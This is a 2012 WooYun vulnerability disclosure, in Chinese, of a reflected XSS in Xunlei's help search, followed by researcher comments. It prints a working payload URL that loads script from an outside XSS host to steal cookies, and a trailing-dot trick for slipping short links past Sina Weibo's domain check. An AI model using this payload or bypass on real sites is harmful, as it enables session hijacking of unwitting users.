迅雷在线客服系统反射型XSS成功盗取cookie+新浪微博网址检查bypass

漏洞概要

缺陷编号:WooYun-2012-016270

漏洞标题:迅雷在线客服系统反射型XSS成功盗取cookie+新浪微博网址检查bypass

相关厂商:迅雷

漏洞作者:Allmylife

提交时间:2012-12-20 14:16

公开时间:2013-02-03 14:16

漏洞类型:XSS 跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2012-12-20: 细节已通知厂商并且等待厂商处理中
2012-12-20: 厂商已经确认,细节仅向厂商公开
2012-12-30: 细节向核心白帽子及相关领域专家公开
2013-01-09: 细节向普通白帽子公开
2013-01-19: 细节向实习白帽子公开
2013-02-03: 细节向公众公开

简要描述:

提交了一个反射型的跨站,只弹个框框,被乌云忽略了,好吧,还得盗取cookie啊。

详细说明:

帮助搜索的地方,过滤不严,可以输入跨站脚本

但是http://help.xunlei.com没找到可以直接给客服发消息的地方,只好转向迅雷官方微博用http://help.xunlei.com/searchResult.html?searchstr=%E2%80%9D%3Cscript%20src=%22http://xsscn.sinaapp.com/?u=8349dd%22%20%3E%20%3C/script%3E%3C!--这个链接用126.am转一下http:/126.am/Zj84p4呵呵,这里面有个小技巧,我想了一会才想到,因为新浪微博不让直接提交126.am的短网址。

我是这样想的,应该是新浪用规则提取出了,域名判断,怎么办呢,哈哈好吧,我们在域名后面加个点吧。http://126.am./Zj84p4

哈哈.成功了。

我想这个方法应该可以绕过新浪微博所有的域名的检查,唉,应该比这个xss有价值吧。

漏洞证明:

最后成功盗取了一个cookie,可惜没能登录,呵呵

修复方案:

迅雷,修复xss吧新浪,修复这个bypass吧。迅雷会员快到期了,求白金会员卡。哈哈

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2012-12-20 17:36

厂商回复:

感谢反馈!

最新状态:

暂无

评价

  1. 2010-01-01 00:00 疯子 白帽子 | Rank:254 漏洞数:39)

    反射性还是别来了,现在的xss不带cookie都不好意思提交。。

  2. 2010-01-01 00:00 鬼魅羊羔 白帽子 | Rank:274 漏洞数:36)

    带了cookie不进后台,都不好意思提交。。

  3. 2010-01-01 00:00 Rookie 白帽子 | Rank:241 漏洞数:48)

    反正就是不好意思提交

  4. 2010-01-01 00:00 鬼魅羊羔 白帽子 | Rank:274 漏洞数:36)

    @Rookie 精辟~~~把我俩的话都总结了。。

  5. 2010-01-01 00:00 小胖胖要减肥 白帽子 | Rank:492 漏洞数:66)

    @鬼魅羊羔 那你们几个基友还刷的那么起劲呢,好基友,好朋友

  6. 2010-01-01 00:00 Spy198x 白帽子 | Rank:0 漏洞数:0)

    写了评论,都不好意思提交..

  7. 2010-01-01 00:00 点点 白帽子 | Rank:99 漏洞数:14)

    看了文章 都不好意思提交..

  8. 2010-01-01 00:00 墨水心_Len 白帽子 | Rank:70 漏洞数:15)

    看了楼主的洞,都不好意思不评论~

  9. 2010-01-01 00:00 mole3o 白帽子 | Rank:10 漏洞数:2)

    都开队列了,都不好意思,不插个队。